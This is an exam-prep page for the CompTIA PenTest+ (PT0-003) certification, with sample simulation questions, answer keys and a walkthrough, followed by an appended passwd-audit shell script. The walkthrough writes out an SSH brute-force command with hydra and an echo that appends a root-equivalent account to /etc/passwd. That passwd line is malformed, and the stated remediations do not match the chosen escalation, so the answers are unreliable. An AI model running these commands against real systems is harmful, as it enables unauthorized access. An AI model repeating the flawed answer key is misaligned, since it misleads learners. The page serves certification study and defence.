
CompTIA PT0-003 Exam Questions - Navigate Your Path to Success

The CompTIA PenTest+ exam (PT0-003) is a good choice for cybersecurity analysts and penetration testers; a candidate who passes it earns the CompTIA PenTest+ certification. Below are some essential facts for CompTIA PT0-003 exam candidates:

  • In the actual CompTIA PenTest+ (PT0-003) exam, a candidate can expect 90 questions, and the officially allowed time is expected to be around 165 minutes.
  • TrendyCerts offers 216 questions that are based on the actual CompTIA PT0-003 syllabus.
  • Our CompTIA PT0-003 exam practice questions were last updated on: Mar 08, 2025

Sample Questions for CompTIA PT0-003 Exam Preparation

Question 1

SIMULATION

A penetration tester performs several Nmap scans against the web application for a client.

INSTRUCTIONS

Click on the WAF and servers to review the results of the Nmap scans. Then click on each tab to select the appropriate vulnerability and remediation options.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

[PT0-003 Exam Question 1, Exhibits 1 to 5]

Correct: A

Most likely vulnerability: Perform an SSRF attack against App01.example.com from CDN.example.com.

Two best remediation options:

  • Restrict direct communications to App01.example.com to only approved components. This limits the exposure of the application server by ensuring that only specified, trusted entities can communicate with it.
  • Require an additional authentication header value between CDN.example.com and App01.example.com. Adding an authentication layer between the CDN and the app server helps ensure that requests are legitimate and originate from trusted sources, mitigating SSRF and other indirect attack vectors.

Nmap scan observations:

  • The CDN/WAF shows HTTP and HTTPS open and MySQL filtered, indicating that it acts as a filtering layer.
  • The app server shows HTTP and HTTPS open and MySQL filtered.
  • The DB server shows all ports filtered, which is typical for a database server that should not be directly accessible.

These findings align with the SSRF vulnerability and the appropriate remediation steps to enhance the security of internal communications.


Question 2

SIMULATION

A previous penetration test report identified a host with vulnerabilities that was successfully exploited. Management has requested that an internal member of the security team reassess the host to determine if the vulnerability still exists.

PT0-003 Exam Question 2 Exhibit 1

Part 1:

  • Analyze the output and select the command to exploit the vulnerable service.

Part 2:

  • Analyze the output from each command.
  • Select the appropriate set of commands to escalate privileges.
  • Identify which remediation steps should be taken.

PT0-003 Exam Question 2 Exhibit 2

Correct: A

The command that would most likely exploit the services is:

```
hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22
```

The appropriate set of commands to escalate privileges is:

```
echo 'root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash' >> /etc/passwd
```

The remediations that should be taken after the successful privilege escalation are:

  • Remove the SUID bit from cp.
  • Make backup script not world-writable.

Comprehensive Step-by-Step Explanation of the Simulation

Part 1: Exploiting Vulnerable Service

Nmap Scan Analysis

Command: nmap -sC -T4 192.168.10.2

Purpose: This command runs a default script scan with timing template 4 (aggressive).

Output:

```
Port      State   Service
22/tcp    open    ssh
23/tcp    closed  telnet
80/tcp    open    http
111/tcp   closed  rpcbind
445/tcp   open    samba
3389/tcp  closed  rdp
```

Ports open are SSH (22), HTTP (80), and Samba (445).

Enumerating Samba Shares

Command: enum4linux -S 192.168.10.2

Purpose: To enumerate Samba shares and users.

Output:

```
user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
user:[proxy] rid:[0x42]
user:[syslog] rid:[0x4ba]
user:[www-data] rid:[0x42a]
user:[root] rid:[0x3e8]
user:[news] rid:[0x3fa]
user:[lowpriv] rid:[0x3fa]
```

We identify a user lowpriv.

Selecting Exploit Command

Hydra Command: hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22

Purpose: To perform a brute force attack on SSH using the lowpriv user and a list of the 500 worst passwords.

  • -l lowpriv: Specifies the username.
  • -P 500-worst-passwords.txt: Specifies the password list.
  • -t 4: Uses 4 tasks/threads for the attack.
  • ssh://192.168.10.2:22: Specifies the SSH service and port.

Executing the Hydra Command

Result: Successful login as lowpriv user if a match is found.

Part 2: Privilege Escalation and Remediation

Finding SUID Binaries and Configuration Files

Command: find / -perm -2 -type f 2>/dev/null | xargs ls -l

Purpose: To find world-writable files.

Command: find / -perm -u=s -type f 2>/dev/null | xargs ls -l

Purpose: To find files with SUID permission.

Command: grep '/bin/bash' /etc/passwd | cut -d':' -f1-4,6,7

Purpose: To identify users with bash shell access.

Selecting Privilege Escalation Command

Command: echo 'root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash' >> /etc/passwd

Purpose: To create a new root user entry in the passwd file.

  • root2: Username.
  • 5ZOYXRFHVZ7OY: Password hash.
  • ::0:0: User and group ID (root).
  • /root: Home directory.
  • /bin/bash: Default shell.

Executing the Privilege Escalation Command

Result: Creation of a new root user root2 with a specified password.

Remediation Steps Post-Exploitation

Remove SUID Bit from cp:

Command: chmod u-s /bin/cp

Purpose: Removing the SUID bit from cp to prevent misuse.

Make Backup Script Not World-Writable:

Command: chmod o-w /path/to/backup/script

Purpose: Ensuring backup script is not writable by all users to prevent unauthorized modifications.

Execution and Verification

Verifying Hydra Attack:

Run the Hydra command and monitor for successful login attempts.

Verifying Privilege Escalation:

After appending the new root user to the passwd file, attempt to switch user to root2 and check root privileges.

Implementing Remediation:

Apply the remediation commands to secure the system and verify the changes have been implemented.

By following these detailed steps, one can replicate the simulation and ensure a thorough understanding of both the exploitation and the necessary remediations.
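To verify that the remediations hold and that no extra root-equivalent account remains, the checks below can be run after the fix. This is an added example, not part of the original page; the function names, the svc_backup account and the sample passwd file are constructed, and only the root2 line is copied from the walkthrough.

```shell
#!/bin/sh
# Added example: re-check the three conditions the walkthrough remediates or abuses.
# Function names and the svc_backup account are constructed for illustration.

# True if FILE still has the SUID bit (octal form of the page's -perm -u=s).
has_suid() { [ -n "$(find "$1" -prune -type f -perm -4000 2>/dev/null)" ]; }

# True if FILE is world-writable (the page's -perm -2 test, on one file).
is_world_writable() { [ -n "$(find "$1" -prune -type f -perm -0002 2>/dev/null)" ]; }

# Report suspicious entries in a passwd-format file, one finding per line.
audit_passwd() {
  awk -F: '
    /^#/ || NF == 0 { next }
    NF != 7                        { print "MALFORMED " $1 }
    $1 != "root" && $3 ~ /^0+$/    { print "UID0 " $1 }
    $2 == ""                       { print "EMPTY_PASSWORD " $1 }
    $2 != "" && $2 != "x" && $2 != "*" && $2 !~ /^!/ { print "HASH_IN_PASSWD " $1 }
  ' "$1"
}

# Constructed sample; the root2 line is copied verbatim from the walkthrough.
sample_passwd() {
  cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
lowpriv:x:1001:1001::/home/lowpriv:/bin/bash
svc_backup:x:0:0::/root:/bin/bash
root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash
EOF
}

# Demo run against the sample; point audit_passwd at /etc/passwd on a real host.
demo=$(mktemp) && sample_passwd > "$demo" && audit_passwd "$demo"
rm -f "$demo"
```

Once both remediations are applied, `has_suid /bin/cp` and `is_world_writable` on the backup script should both return non-zero, and `audit_passwd /etc/passwd` should print nothing.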

